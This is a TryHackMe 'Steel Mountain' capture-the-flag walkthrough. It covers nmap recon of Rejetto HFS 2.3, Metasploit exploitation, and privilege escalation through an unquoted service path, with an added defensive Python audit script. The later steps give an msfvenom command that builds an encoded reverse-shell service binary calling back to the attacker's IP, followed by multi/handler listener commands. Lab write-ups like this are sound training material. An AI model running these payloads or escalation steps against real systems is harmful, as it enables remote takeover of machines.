TryHackMe Steel Mountain
Awesome box using Metasploit for initial access, which is always a treat.

Metasploit never disappoints, especially with a beginner-friendly box such as THM "Steel Mountain". With a little bit of recon we can see that Rejetto HttpFileServer (HFS) 2.3 is running on port 8080.
sudo nmap -sS -sV -O -A -Pn -p 8080 -oA steelmountain 10.10.109.225
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-08 13:41 EDT
Nmap scan report for 10.10.109.225
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 128.59 ms 10.11.0.1
2 128.70 ms 10.10.109.225
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds

Luckily for us, Metasploit has a nifty module to conduct remote code execution against this HFS version and obtain a low-privilege user Meterpreter session.
msf6 exploit(multi/handler) > search Rejetto

Once we obtain our first session, it's easy to upload post-exploitation tools such as "PowerUp.ps1" for additional recon, which will hopefully shed light on the next steps for privilege escalation.


The AdvancedSystemCareService9 service seems to have an unquoted service path for ASCService.exe. Now that we have this information we can craft a reverse shell using msfvenom and attempt to escalate privileges.
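The unquoted service path that PowerUp flags here is just as easy to audit from the defensive side. The following Python script is an added example, not part of the original write-up and not PowerUp's code: it parses service ImagePath strings the way the Windows service control manager resolves them, flags unquoted paths that contain spaces, lists the intermediate paths Windows probes before reaching the intended binary (these are the directories whose write ACLs an administrator must check), and produces the quoted ImagePath that fixes the issue. The service and executable names are taken from the box, but the install directory and the other three sample entries are constructed placeholders.

```python
import re

# Constructed sample ImagePath values for this example. The service and
# executable names come from the write-up; the install directory and the
# remaining entries are placeholders, not the box's real registry values.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9":
        r"C:\Program Files (x86)\Example Vendor\Advanced Care\ASCService.exe",
    "QuotedService":
        r'"C:\Program Files\Example Vendor\Quoted Service\svc.exe" -run',
    "Spooler":
        r"C:\Windows\System32\spoolsv.exe",
    "UnquotedWithArgs":
        r"C:\Tools\My Agent\agent.exe --service",
}

# Executable portion ends at the first ".exe"; anything after whitespace is arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(image_path: str):
    """Return (executable, arguments, was_quoted) for a service ImagePath."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in ImagePath")
        return s[1:end], s[end + 1:].strip(), True
    m = _EXE_RE.match(s)
    if m:
        return m.group(1), (m.group(2) or "").strip(), False
    # No .exe extension: treat the first whitespace-delimited token as the binary.
    parts = s.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else ""), False


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the executable path is unquoted and contains a space."""
    exe, _args, quoted = split_image_path(image_path)
    return (not quoted) and (" " in exe)


def candidate_paths(image_path: str):
    """Paths Windows tries, in order, before the intended binary.

    For an unquoted path with spaces, CreateProcess treats each space as a
    possible end of the executable name and appends ".exe"; a writable
    directory for any of these lets an unprivileged user plant a binary.
    """
    exe, _args, quoted = split_image_path(image_path)
    if quoted or " " not in exe:
        return []
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def quote_image_path(image_path: str) -> str:
    """Remediated ImagePath: executable wrapped in quotes, arguments preserved."""
    exe, args, _quoted = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(services):
    """Map each affected service name to the paths whose parent ACLs need review."""
    findings = {}
    for name, image_path in services.items():
        if is_unquoted_with_spaces(image_path):
            findings[name] = candidate_paths(image_path)
    return findings


if __name__ == "__main__":
    for svc, paths in audit(SAMPLE_SERVICES).items():
        print(f"{svc}: unquoted ImagePath with spaces; check write ACLs on parents of:")
        for p in paths:
            print("    ", p)
        print("  fix:", quote_image_path(SAMPLE_SERVICES[svc]))
```

On a real host, feed the script the PathName values from `Get-CimInstance Win32_Service` (or `wmic service get name,pathname`) rather than the constructed dictionary, and apply the fix with `sc config <name> binPath=` followed by the quoted path. A service counts as exploitable only when one of the listed intermediate directories is writable by a low-privilege user, so the ACL check is the second half of the audit.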

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.36.145 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
Upload our new executable to the target machine!

Ensure that we have a multi/handler listening on port 4443:
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 10.11.36.145
set LPORT 4443
exploit -j
Now we need to stop and restart AdvancedSystemCareService9 so the service control manager picks up our binary.
Boom!!! We have our callback!!
